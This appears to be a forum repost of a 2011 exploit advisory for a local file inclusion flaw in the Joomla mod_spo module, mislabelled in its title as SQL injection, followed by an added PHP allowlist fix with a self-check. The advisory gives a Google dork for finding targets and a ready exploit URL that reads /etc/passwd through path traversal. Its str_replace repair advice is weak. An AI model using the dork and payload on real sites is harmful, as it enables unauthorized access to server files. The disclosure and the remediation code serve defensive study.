
  #213  
22.07.2011, 12:33
абвгдешка

Joomla Component mod_spo SQL Injection Vulnerability

# Exploit Title: Simple Page Option LFI

# Google Dork: inurl:mod_spo

# Date: 15/07/2011

# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca

# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip

# Version: 1.5.x

# Tested on: Backtrack and Windows 7

Simple Page Option – LFI

Vulnerable-Code:

$s_lang =& JRequest::getVar('spo_site_lang');

(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
    ? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
    : include(dirname(__FILE__).DS.'languages'.DS.'english.php');

Vulnerable-Var:

spo_site_lang=

Expl0iting:

http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd%00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se

Repairing?:

Just Filter with str_replace(); or htaccess protection to the vulnerable file.

gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.
 
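An allowlist version of the language include from the advisory above, given as an added example that is not part of the original post or of mod_spo's own code. The helper name spo_resolve_language_file() and the temporary demo directory are assumptions, and the code assumes PHP 7 or later.

```php
<?php
// Added example: spo_resolve_language_file() is a hypothetical helper, not mod_spo code.
// It returns the path to include; any input that is not a shipped language falls back.
function spo_resolve_language_file(string $baseDir, $requested, string $default = 'english'): string
{
    $langDir = realpath($baseDir . DIRECTORY_SEPARATOR . 'languages');
    if ($langDir === false) {
        throw new RuntimeException('languages directory not found');
    }
    $fallback = $langDir . DIRECTORY_SEPARATOR . $default . '.php';

    // 1. Accept only a plain language name: this rejects arrays
    //    (spo_site_lang[]=...), NUL bytes, dots, slashes and backslashes.
    if (!is_string($requested) || !preg_match('/\A[a-z][a-z0-9_-]{0,31}\z/i', $requested)) {
        return $fallback;
    }

    // 2. Allowlist: the name must match a file actually shipped in languages/.
    $allowed = array();
    foreach (glob($langDir . DIRECTORY_SEPARATOR . '*.php') ?: array() as $file) {
        $allowed[basename($file, '.php')] = $file;
    }
    if (!isset($allowed[$requested])) {
        return $fallback;
    }

    // 3. Defence in depth: the resolved path must still sit inside languages/
    //    (catches a symlinked language file pointing elsewhere).
    $real = realpath($allowed[$requested]);
    if ($real === false || strpos($real, $langDir . DIRECTORY_SEPARATOR) !== 0) {
        return $fallback;
    }
    return $real;
}

// Constructed self-check: a temporary module directory with two language files.
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'spo_demo_' . uniqid();
mkdir($tmp . '/languages', 0700, true);
file_put_contents($tmp . '/languages/english.php', '<?php // en');
file_put_contents($tmp . '/languages/spanish.php', '<?php // es');

// Constructed inputs: one valid name, the traversal value from the advisory, and others.
$cases = array('spanish', "../../../../etc/passwd\0", 'english/../spanish', array('x'), 'klingon');
foreach ($cases as $input) {
    echo str_pad(json_encode($input), 36), ' => ', basename(spo_resolve_language_file($tmp, $input)), PHP_EOL;
}
array_map('unlink', glob($tmp . '/languages/*.php'));
rmdir($tmp . '/languages');
rmdir($tmp);
```

In the module, the result would be passed to include in place of the ternary; only `spanish` resolves to `spanish.php`, every other constructed input resolves to `english.php`.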